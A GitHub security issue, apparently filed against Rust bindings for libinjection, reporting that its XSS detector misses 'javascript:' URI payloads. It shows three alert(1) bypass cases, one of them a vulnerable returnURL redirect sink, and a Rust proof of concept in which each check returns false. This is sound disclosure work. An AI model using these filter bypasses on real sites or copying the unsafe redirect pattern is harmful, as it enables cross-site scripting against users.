[SECURITY] Possible DOM Base XSS #2

raminfp · 2019-01-15T11:22:23Z

Hi,

Methods for bypass libinjection-rs of DOM base XSS

1- javascript:alert(eval("2*3"));

Senario

PoC : http://example.com/?returnURL=javascript:alert(1);

          var redirectUrl = getUrlParameter('returnURL');
          window.parent.location.href = redirectUrl;

2- a tag when user click button and trigger alert :).

	 <a href="javascript:alert(1);"> click me </a>

3- title value

     `<img id="testz" title="javascript:alert(1)">`

        <script>
         document.location.href=window.testz.title;
        </script>

Real example :

source image : https://twitter.com/Milad_Bahari/status/990539191544156160

Source

[dependencies]
json = "0.11.13"
libinjection = "0.1"

#[macro_use]
extern crate json;
extern crate libinjection;

use libinjection::{xss};


fn main() {
    let data = object!{
        "foo" => "javascript:alert(1);",
    };

    let is_xss = xss("javascript:alert(1);").unwrap();
    let is_xss_2 = xss(&data.dump()).unwrap();
    let is_xss_3 = xss("<img id='testz' title='javascript:alert(1)'>").unwrap();
    
    println!("{}", data); 
    println!("{}", is_xss); // false
    println!("{}", is_xss_2); // false
    println!("{}", is_xss_3); // false

}

Thanks,
Ramin - kernel security engineering
Best regards,

The text was updated successfully, but these errors were encountered:

yaa110 · 2019-01-15T11:26:21Z

Thank you for the report. Please note that this repository is a bindings to libinjection.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[SECURITY] Possible DOM Base XSS #2

[SECURITY] Possible DOM Base XSS #2

raminfp commented Jan 15, 2019

yaa110 commented Jan 15, 2019

[SECURITY] Possible DOM Base XSS #2

[SECURITY] Possible DOM Base XSS #2

Comments

raminfp commented Jan 15, 2019

Senario

Real example :

Source

yaa110 commented Jan 15, 2019